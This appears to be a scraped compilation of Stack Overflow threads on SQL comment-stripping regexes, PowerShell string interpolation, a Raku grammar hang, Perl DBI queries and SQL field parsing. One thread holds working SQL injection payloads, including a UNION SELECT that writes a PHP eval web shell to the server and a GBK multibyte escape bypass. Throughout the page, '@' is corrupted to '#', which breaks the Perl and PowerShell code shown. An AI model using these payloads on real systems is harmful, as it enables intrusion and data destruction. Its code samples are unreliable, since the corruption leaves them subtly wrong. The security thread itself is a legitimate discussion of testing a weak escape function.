I'm trying to come up with a regular expression to remove comments from an SQL statement.
This regex almost works:
(/\*([^*]|[\r\n]|(\*+([^*/]|[\r\n])))*\*+/)|'(?:[^']|'')*'|(--.*)
Excepth that last part doesn't handle "--" comments very well. The problem is handling SQL strings, delimited with ''.
For example, if i have
SELECT ' -- Hello -- ' FROM DUAL
It shouldn't match, but it's matching.
This is in ASP/VBscript.
I've thought about matching right-to-left but i don't think the VBScript's regex engine supports it. Also tried fiddling with negative lookbehind but the results weren't good.
In PHP, i'm using this code to uncomment SQL:
$sqlComments = '#(([\'"]).*?[^\\\]\2)|((?:\#|--).*?$|/\*(?:[^/*]|/(?!\*)|\*(?!/)|(?R))*\*\/)\s*|(?<=;)\s+#ms';
/* Commented version
$sqlComments = '#
(([\'"]).*?[^\\\]\2) # $1 : Skip single & double quoted expressions
|( # $3 : Match comments
(?:\#|--).*?$ # - Single line comments
| # - Multi line (nested) comments
/\* # . comment open marker
(?: [^/*] # . non comment-marker characters
|/(?!\*) # . ! not a comment open
|\*(?!/) # . ! not a comment close
|(?R) # . recursive case
)* # . repeat eventually
\*\/ # . comment close marker
)\s* # Trim after comments
|(?<=;)\s+ # Trim after semi-colon
#msx';
*/
$uncommentedSQL = trim( preg_replace( $sqlComments, '$1', $sql ) );
preg_match_all( $sqlComments, $sql, $comments );
$extractedComments = array_filter( $comments[ 3 ] );
var_dump( $uncommentedSQL, $extractedComments );
This code works for me:
function strip_sqlcomment ($string = '') {
$RXSQLComments = '#(--[^\r\n]*)|(\#[^\r\n]*)|(/\*[\w\W]*?(?=\*/)\*/)#ms';
return (($string == '') ? '' : preg_replace( $RXSQLComments, '', $string ));
}
with a little regex tweak it could be used to strip comments in any language
As you said that the rest of your regex is fine, I focused on the last part. All you need to do is verify that the -- is at the beginning and then make sure it removes all dashes if there are more than 2. The end regex is below
(^[--]+)
The above is just if you want to remove the comment dashes and not the whole line. You can run the below if you do want everything after it to the end of the line, also
(^--.*)
Originally, I used #Adrien Gibrat's solution. However, I came across a situation where it wasn't parsing quoted strings, properly, if I had anything with a preceding '--' inside of them. I ended up writing this, instead:
'[^']*(?!\\)'(*SKIP)(*F) # Make sure we're not matching inside of quotes
|(?m-s:\s*(?:\-{2}|\#)[^\n]*$) # Single line comment
|(?:
\/\*.*?\*\/ # Multi-line comment
(?(?=(?m-s:\h+$)) # Get trailing whitespace if any exists and only if it's the rest of the line
\h+
)
)
# Modifiers used: 'xs' ('g' can be used as well, but is enabled by default in PHP)
Please note that this should be used when PCRE is available. So, in my case, I'm using a variation of this in my PHP library.
Example
remove /**/ and -- comments
function unComment($sql){
$re = '/(--[^\n]*)/i';
$sql = preg_replace( $re, '', $sql );
$sqlComments = '#(([\'"]).*?[^\\\]\2)|((?:\#|--).*?$|/\*(?:[^/*]|/(?!\*)|\*(?!/)|(?R))*\*\/)\s*|(?<=;)\s+#ms';
$uncommentedSQL = trim( preg_replace( $sqlComments, '$1', $sql ) );
preg_match_all( $sqlComments, $sql, $comments );
$sql = preg_replace('/[\x00-\x1F\x80-\xFF]/', '', trim($uncommentedSQL));
return $sql;
}
Please see my answer here. It works both for line comments and for block comments, even nested block comments. I guess you need to use regex with balancing groups, which AFAIK is not available in VBScript.
For Node.js, see pg-minify library. It works with PostgreSQL, MS-SQL and MySQL scripts.
It can handle all types of comments, plus compress the resulting SQL to its bare minimum, to optimize what needs to be sent to the server.
Three regular expressions in an array for a preg_replace is just as fast as a single complex expression. Example for PHP:
function removeSqlComment($sqlString){
$regEx = [
'~(?:".*?"|\'.*?\')(*SKIP)(*F)|--.*$~m',
'~(?:".*?"|\'.*?\')(*SKIP)(*F)|/\*.*?\*/~s',
'~^;?\R~m'
];
return trim(preg_replace($regEx, '', $sqlString));
}
//test
$sqlWithComment = <<<SQL
-- first Comment;
Delete * from /* table1 */table where s = '--'; -- comm2
/*
* comment 3
*/
SELECT ' -- Hello -- ' FROM DUAL;
SQL;
$sql = removeSqlComment($sqlWithComment);
$expected = "Delete * from table where s = '--'; \nSELECT ' -- Hello -- ' FROM DUAL;";
var_dump($sql === $expected); //bool(true)
For all PHP folks: please use this library - https://github.com/jdorn/sql-formatter. I have been dealing with stripping comments from SQL for couple years now and the only valid solution would be a tokenizer/state machine, which I lazily resisted to write. Couple days ago I found out this lib and ran 120k queries through it and found only one bug (https://github.com/jdorn/sql-formatter/issues/93), which is fixed immediately in our fork https://github.com/keboola/sql-formatter.
The usage is simple
$query <<<EOF
/*
my comments
*/
SELECT 1;
EOF;
$bareQuery = \SqlFormatter::removeComments($query);
// prints "SELECT 1;"
print $bareQuery;
Related
I have a string that I want to insert dynamically a variable. Ex;
$tag = '{"number" = "5", "application" = "test","color" = "blue", "class" = "Java"}'
I want to accomplish:
$mynumber= 2
$tag = '{"number" = "$($mynumber)", "application" = "test","color" = "blue", "class" = "Java"}'
What I want is to have the variable inserted on the string, But it is not going through. I guess the '' sets all as a string. Any recomendations on how should I approach this?
thanks!
powershell test and trial and error. Also Google.
The reason your current attempt doesn't work is that single-quoted (') string literals in PowerShell are verbatim strings - no attempt will be made at expanding subexpression pipelines or variable expressions.
If you want an expandable string literal without having to escape all the double-quotes (") contained in the string itself, use a here-string:
$mynumber = 2
$tag = #"
{"number" = "$($mynumber)", "application" = "test","color" = "blue", "class" = "Java"}
"#
To add to Mathias' helpful answer:
Mistakenly expecting string interpolation inside '...' strings (as opposed to inside "...") has come up many times before, and questions such as yours are often closed as a duplicate of this post.
However, your question is worth answering separately, because:
Your use case introduces a follow-up problem, namely that embedded " characters cannot be used as-is inside "...".
More generally, the linked post is in the context of argument-passing, where additional rules apply.
Note: Some links below are to the relevant sections of the conceptual about_Quoting_Rules help topic.
In PowerShell:
only "..." strings (double-quoted, called expandable strings) perform string interpolation, i.e. expansion of variable values (e.g. "... $var" and subexpressions (e.g., "... $($var.Prop)")
not '...' strings (single-quoted, called verbatim strings), whose values are used verbatim (literally).
With "...", if the string value itself contains " chars.:
either escape them as `" or ""
E.g., with `"; note that while use of $(...), the subexpression operator never hurts (e.g. $($mynumber)), it isn't necessary with stand-alone variable references such as $mynumber:
$mynumber= 2
$tag = "{`"number`" = `"$mynumber`", `"application`" = `"test`",`"color`" = `"blue`", `"class`" = `"Java`"}"
Similarly, if you want to selectively suppress string interpolation, escape $ as `$
# Note the ` before the first $mynumber.
# -> '$mynumber = 2'
$mynumber = 2; "`$mynumber` = $mynumber"
See the conceptual about_Special_Characters help topic for info on escaping and escape sequences.
If you need to embed ' inside '...', use '', or use a (single-quoted) here-string (see next).
or use a double-quoted here-string instead (#"<newline>...<newline>"#):
See Mathias' answer, but generally note the strict, multiline syntax of here-strings:
Nothing (except whitespace) must follow the opening delimiter on the same line (#" / #')
The closing delimiter ("# / '#) must be at the very start of the line - not even whitespace may come before it.
Related answers:
Overview of PowerShell's expandable strings
Overview of all forms of string literals in PowerShell
When passing strings as command arguments, they are situationally implicitly treated like expandable strings (i.e. as if they were "..."-enclosed); e.g.
Write-Output $HOME\projects - see this answer.
Alternatives to string interpolation:
Situationally, other approaches to constructing a string dynamically can be useful:
Use a (verbatim) template string with placeholders, with -f, the format operator:
$mynumber= 2
# {0} is the placeholder for the first RHS operand ({1} for the 2nd, ...)
'"number" = "{0}", ...' -f $mynumber # -> "number" = "2", ...
Use simple string concatenation with the + operator:
$mynumber= 2
'"number" = "' + $mynumber + '", ...' # -> "number" = "2", ...
I am trying to parse a BibTeX author field using the following grammar:
use v6;
use Grammar::Tracer;
# Extract BibTeX author parts from string. The parts are separated
# by a comma and optional space around the comma
grammar Author {
token TOP {
<all-text>
}
token all-text {
[<author-part> [[\s* ',' \s*] || [\s* $]]]+
}
token author-part {
[<-[\s,]> || [\s* <!before ','>]]+
}
}
my $str = "Rockhold, Mark L";
my $result = Author.parse( $str );
say $result;
Output:
TOP
| all-text
| | author-part
| | * MATCH "Rockhold"
| | author-part
But here the program hangs (I have to press CTRL-C) to abort.
I suspect the problem is related to the negative lookahead assertion. I tried to remove it, and then the program does not hang anymore, but then I am also not able to extract the last part "Mark L" with an internal space.
Note that for debugging purposes, the Author grammar above is a simplified version of the one used in my actual program.
The expression [\s* <!before ','>] may not make any progress. Since it's in a quantifier, it will be retried again and again (but not move forward), resulting in the hang observed.
Such a construct will reliably hang at the end of the string; doing [\s* <!before ',' || $>] fixes it by making the lookahead fail at the end of the string also (being at the end of the string is a valid way to not be before a ,).
At least for this simple example, it looks like the whole author-part token could just be <-[,]>+, but perhaps that's an oversimplification for the real problem that this was reduced from.
Glancing at all-text, I'd also point out the % quantifier modifier which makes matching comma-separated (or anything-separated, really) things easier.
When I use the following code, I only seem to print the last results from my array. I think it has something to do with my like clause and the % sign. Any ideas?
my #keywords = <IN>;
my #number = <IN2>;
foreach my $keywords (#keywords)
{
chomp $keywords;
my $query = "select *
from table1 a, table2 b
where a.offer = b.offer
and a.number not in (#number)
and a.title like ('%$keywords%')";
print $query."\n";
my $sth = $dbh->prepare($query)
or die ("Error: Could not prepare sql statement on $server : $sth\n" .
"Error: $DBI::errstr\n");
$sth->execute
or die ("Error: Could not execute sql statement on $server : $sth\n" .
"Error: $DBI::errstr\n");
while (my #results = $sth->fetchrow_array())
{
print OUT "$results[0]\t$results[1]\t$results[2]\t$results[3]\t",
"$results[4]\t$results[5]\t$results[6]\t$results[7]\t",
"$results[8]\n";
}
}
close (OUT);
I'm guessing that your IN file was created on a Windows system, so has CRLF sequences (roughly \r\n) between the lines, but that you're running this script on a *nix system (or in Cygwin or whatnot). So this line:
chomp $keywords;
will remove the trailing \n, but not the \r before it. So you have a stray carriage-return inside your LIKE expression, and no rows match it.
If my guess is right, then you would fix it by changing the above line to this:
$keywords =~ s/\r?\n?\z//;
to remove any carriage-return and/or newline from the end of the line.
(You should also make the changes that innaM suggests above, using bind variables instead of interpolating your values directly into the query. But that change is orthogonal to this one.)
Show the output of the print $query and maybe we can help you. Better yet, show the output of:
use Data::Dumper;
$Data::Dumper::Useqq=1;
print Dumper($query);
Until then, your comment about "replaces the an of and" makes me think your input has carriage returns, and the use of #number is unlikely to work if there's more than one.
In an application I'm working on I've found a weak escape function to prevent injection. I'm trying to prove this, but I'm having trouble coming up with a simple example.
The escape function works as follows (PHP example).
function escape($value) {
$value = str_replace("'","''",$value);
$value = str_replace("\\","\\\\",$value);
return $value;
}
I realize this doesn't deal with values encoded using double quotes ("), but all queries are constructed using single quotes (').
Who can defeat this escape function?
Requirements:
String in queries are always enclosed in quotes.
Double-quotes are never used.
MySQL connection is set to UTF8.
Simple examples:
$sql = "SELECT id FROM users WHERE username = '" . escape($username) . "' AND password = '" . escape($password) . "'";
$sql = "UPDATE users SET email = '" . escape($email) . "' WHERE id = '" . escape($id) . "'";
If you are just replacing ' with '' then you could exploit this by injecting a \' which will turn into a \'' and this will allow you to break out because this gives you a "character literal" single-quote and a real single-quote. However, the replacement of "\\" with "\\\\" negates this attack. The double-single-quote is used to "escape" single quotes for MS-SQL, but this isn't proper for MySQL, but it can work.
The following codes proves that this escape function is safe for all except three conditions. This code permutes though all possible variations of control charters, and testing each one to make sure an error doesn't occur with a single quote encased select statement. This code was tested on MySQL 5.1.41.
<?php
mysql_connect("localhost",'root','');
function escape($value) {
$value = str_replace("'","''",$value);
$value = str_replace("\\","\\\\",$value);
return $value;
}
$chars=array("'","\\","\0","a");
for($w=0;$w<4;$w++){
for($x=0;$x<4;$x++){
for($y=0;$y<4;$y++){
for($z=0;$z<4;$z++){
mysql_query("select '".escape($chars[$w].$chars[$x].$chars[$y].$chars[$z])."'") or die("!!!! $w $x $y $z ".mysql_error());
}
}
}
}
print "Escape function is safe :(";
?>
Vulnerable Condition 1: no quote marks used.
mysql_query("select username from users where id=".escape($_GET['id']));
Exploit:
http://localhost/sqli_test.php?id=union select "<?php eval($_GET[e]);?>" into outfile "/var/www/backdoor.php"
Vulnerable Condition 2: double quote marks used
mysql_query("select username from users where id=\"".escape($_GET['id'])."\"");
Exploit:
http://localhost/sqli_test.php?id=" union select "<?php eval($_GET[e]);?>" into outfile "/var/www/backdoor.php" -- 1
Vulnerable Condition 2: single quotes are used, however an alternative character set is used..
mysql_set_charset("GBK")
mysql_query("select username from users where id='".escape($_GET['id'])."'");
Exploit:
http://localhost/sqli_test.php?id=%bf%27 union select "<?php eval($_GET[e]);?>" into outfile "/var/www/backdoor.php" -- 1
The conclusion is to always use mysql_real_escape_string() as the escape routine for MySQL. Parameterized query libraries like pdo and adodb always use mysql_real_escape_string() when connected to a mysql database. addslashes() is FAR BETTER of an escape routine because it takes care of vulnerable condition 2. It should be noted that not even mysql_real_escape_string() will stop condition 1, however a parameterized query library will.
Indeed, in addition you could try something with UNION SELECT
shop.php?productid=322
=>
shop.php?productid=322 UNION SELECT 1,2,3 FROM users WHERE 1;--
To display information from other tables.
Of course you would have to change the table name and the numbers inside the UNION SELECT to match the amount of columns you have. This is a popular way of extracting data like admin user names and passwords.
The escape function doesn't handle multibyte characters. Check http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string to see how to exploit this escape function.
Have fun hacking your database!
How about when dealing with numbers?
shop.php?productid=322
becomes
SELECT * FROM [Products] WHERE productid=322
shop.php?productid=322; delete from products;--
becomes
SELECT * FROM [Products] WHERE productid=322; delete from products;--
(Not all queries are built with single quotes and strings)
Since you are using UTF-8 as the encoding, this could be vulnerable to an overlong UTF-8 sequence. An apostrophe character ('), while normally encoded as 0x27, could be encoded as the overlong sequence 0xc0 0xa7 (URL-encoded: %c0%a7). The escape function would miss this, but MySQL may interpret it in a way that causes a SQL injection.
As others have mentioned, you really need to be using mysql_real_escape_string at minimum (easy fix in your case), which should be handling character encoding and other issues for you. Preferably, switch to using prepared statements.
I've never used PHP, however, can you not use Stored Procedure calls instead of direct SQL statements? It seems like a better defense against SQL injection than trying to use an escape function.
An escape function, however, would be useful against malicious javascript.
how about...
\' or 1=1--
Which should be expanded to:
\'' or 1=1--
So using it for id in the following query...
$sql = "UPDATE users SET email = '" . escape($email) . "' WHERE id = '" . escape($id) . "'";
should result in:
$sql = "UPDATE users SET email = '<whatever>' WHERE id = '\'' or 1=1--';
I have a series of select statements in a text file and I need to extract the field names from each select query. This would be easy if some of the fields didn't use nested functions like to_char() etc.
Given select statement fields that could have several nested parenthese like:
ltrim(rtrim(to_char(base_field_name, format))) renamed_field_name,
Or the simple case of just base_field_name as a field, what would the regex look like in Perl?
Don't try to write a regex parser (though perl regexes can handle nested patterns like that), use SQL::Statement::Structure.
Why not ask the target database itself how it would interpret the queries?
In perl, one can use the DBI to query the prepared representation of a SQL query. Sometimes this is database-specific: some drivers (under the perl DBD:: namespace) support their RDBMS' idea of describing statements in ways analogous to the RDBMS' native C or C++ API.
It can be done generically, however, as the DBI will put the names of result columns in the statement handle attribute NAME. The following, for example, has a good chance of working on any DBI-supported RDBMS:
use strict;
use warnings;
use DBI;
use constant DSN => 'dbi:YouHaveNotToldUs:dbname=we_do_not_know';
my $dbh = DBI->connect(DSN, ..., { RaiseError => 1 });
my $sth;
while (<>) {
next unless /^SELECT/i; # SELECTs only, assume whole query on one line
chomp;
my $sql = /\bWHERE\b/i ? "$_ AND 1=0" : "$_ WHERE 1=0"; # XXX ugly!
eval {
$sth = $dbh->prepare($sql); # some drivers don't know column names
$sth->execute(); # until after a successful execute()
};
print $#, next if $#; # oops, problem with that one
print join(', ', #{$sth->{NAME}}), "\n";
}
The XXX ugly! bit there tries to append an always-false condition on the SELECT, so that the SQL engine doesn't have to do any real work when you execute(). It's a terribly naive approach -- that /\bWHERE\b/i test is no more correctly identifying a SQL WHERE clause than simple regexes correctly parse out SELECT field names -- but it is likely to work.
In a somewhat related problem at the office I used:
my #SqlKeyWordList = qw/select from where .../; # (1)
my #Candidates =split(/\s/,$SqlSelectQuery); # (2)
my %FieldHash; # (3)
for my $Word (#Candidates) {
next if grep($word,#SqlKeyWordList);
$FieldHash($Word)++;
}
Comments:
SqlKeyWordList contains all the SQL keywords that are potentially in the SQL statement (we use MySQL, there are many SQL dialiects, choosing/building this list is work, look at my comments below!). If someone decided to use a keyword as a field name, you will need a regex after all (beter to refactor the code).
Split the SQL statement into a list of words, this is the trickiest part and WILL REQUIRE tweeking. For now it uses Perl notion of "space" (=not in word) to split. Splitting the field list (select a,b,c) and the "from" portion of the SQL might be advisabel here, depends on your SQL statements.
%MyFieldHash will contain one entry per select field (and gunk, until you validated your SqlKeyWorkList and the regex in (2)
Beware
there is nothing in this code that could not be done in Python.
your life would be much easier if you can influence the creation of said SQL statements. (e.g. make sure each field is written to a comment)
there are so many things that can/will go wrong in this parsing approach, you really should sidestep the issue entirely, by changing the process (saves time in the long run).
this is the regex we use at the office
my #Candidates=split(/[\s
\(
\)
\+
\,
\*
\/
\-
\n
\
\=
\r
]+/,$SqlSelectQuery
);
How about splitting each line into terms (replace every parenthesis, comma and space with a newline), then sorting:
perl -ne's/[(), ]/\n/g; print' < textfile | sort -u
You'll end up with a lot of content like:
fieldname1
fieldname1
formatstring
ltrim
rtrim
t_char